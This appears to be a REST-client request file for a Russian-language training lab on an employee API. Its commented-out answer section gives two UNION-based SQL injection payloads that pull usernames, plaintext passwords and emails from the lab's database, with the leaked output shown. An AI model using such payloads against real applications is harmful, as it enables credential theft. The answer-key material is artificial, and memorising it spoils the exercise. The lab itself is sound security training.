# @import ./variables.http

################################################## Обзор начального состояния ##################################################
### GetEmployeesAsync
POST {{baseUrl}}

### GetEmployeeByIdAsync
GET {{baseUrl}}/{{user01Id}}

################################################## Создание сотрудника ##################################################
###

###

################################################## Изменение сотрудника ##################################################
###

###

################################################## Удаление сотрудника ##################################################
###

###



# ################################################## ANSWER 01 ##################################################
# ### Хоть с латиницей вперемешку с кириллицей, но теперь ответ представляет из себя запрос, дающий ответ
# GET {{baseUrl}}/task/?id='+union+select+id,+concat(username,+" Password:",+password+),+null+from+users+where+username+=+'{{user01}}'-- \
# # Ваш id:9<br>Ваш логин:Volk2 Password:Wa spoiuuuuu

# ################################################## ANSWER 02 ##################################################
# ### Полный ответ: все смысловые поля
# GET {{baseUrl}}/task/?id='+union+select+u.id,+concat(u.username,+" Password:",+u.password,+" Email:",+(select+e.email_id+from+emails+e+where+e.id+=+u.id+limit+0,+1)+),+null+from+users+u+where+username+=+'{{user02}}'-- \
# # Ваш id:4<br>Ваш логин:Vinni-pukh Password:Ya tu4ka-tu4ka-tu4ka Email:honey_lover@otus-lab.com
